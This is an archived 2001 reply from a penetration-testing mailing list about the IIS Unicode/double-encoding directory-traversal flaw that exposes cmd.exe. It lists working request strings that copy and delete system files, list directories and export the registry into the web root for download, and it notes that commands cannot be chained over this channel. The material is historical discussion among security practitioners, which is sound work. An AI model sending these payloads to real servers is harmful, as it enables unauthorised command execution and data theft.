Penetration Testing mailing list archives
RE: IIS : access to cmd.exe and multiple commands on one line
From: Sam Steinmeyer <SamSteinmeyer () winn-dixie com>
Date: Wed, 24 Oct 2001 13:54:58 -0400
I've tried vairous combinations myself. You can call any vaild cmd.exe DOS command. Example: Copy: scripts/..%25%35c../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\xcopy.e xe+c:\Mycopy.exe Delete: scripts/..%25%35c../winnt/system32/cmd.exe?/c+del+c:\winnt\system32\xcopy.ex e+c:\Mycopy.exe Dir with /w scripts/..%25%35c../winnt/system32/cmd.exe?/c+dir+/w Here's a cool one: Dump the registry to a text file and view from web... :) scripts/..%25%35c../winnt/system32/cmd.exe?/c+regedit+/e+c:\inetpub\wwwroot\ registry.txt When executing the cmd.exe through IIS, you only have a one shot. However, when you are in the DOS Shell, you have the advantage of the Shell to parse your command lines. Ie.
dir /w | cmd
You will not be able to memic this through IIS, due to the absence of the DOS Shell. my 2 cents. ______ /_____/\ Harry Steinmeyer /____ \\ \ Senior Programmer /_____\ \\ / Winn-Dixie, Inc. /_____/ \/ / / /_____/ / \//\ rm -rf /bin/laden \_____\//\ / / \_____/ / /\ / \_____/ \\ \ \_____\ \\ \_____\/ "Science without religion is lame, religion without science is blind." Einstein, Albert (1879-1955) ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
Current thread:
- IIS : access to cmd.exe and multiple commands on one line Daniel Polombo (Oct 23)
- Re: IIS : access to cmd.exe and multiple commands on one line hellNbak (Oct 23)
- Re: IIS : access to cmd.exe and multiple commands on one line Rebecca Kastl (Oct 23)
- Re: IIS : access to cmd.exe and multiple commands on one line Alex Butcher (pentest) (Oct 23)
- Re: IIS : access to cmd.exe and multiple commands on one line Emre Yildirim (Oct 23)
- Re: IIS : access to cmd.exe and multiple commands on one line Rainer Duffner (Oct 24)
- Re: IIS : access to cmd.exe and multiple commands on one line Daniel Polombo (Oct 24)
- <Possible follow-ups>
- Re: IIS : access to cmd.exe and multiple commands on one line Garreth Jeremiah/Markham/IBM (Oct 24)
- RE: IIS : access to cmd.exe and multiple commands on one line Sam Steinmeyer (Oct 24)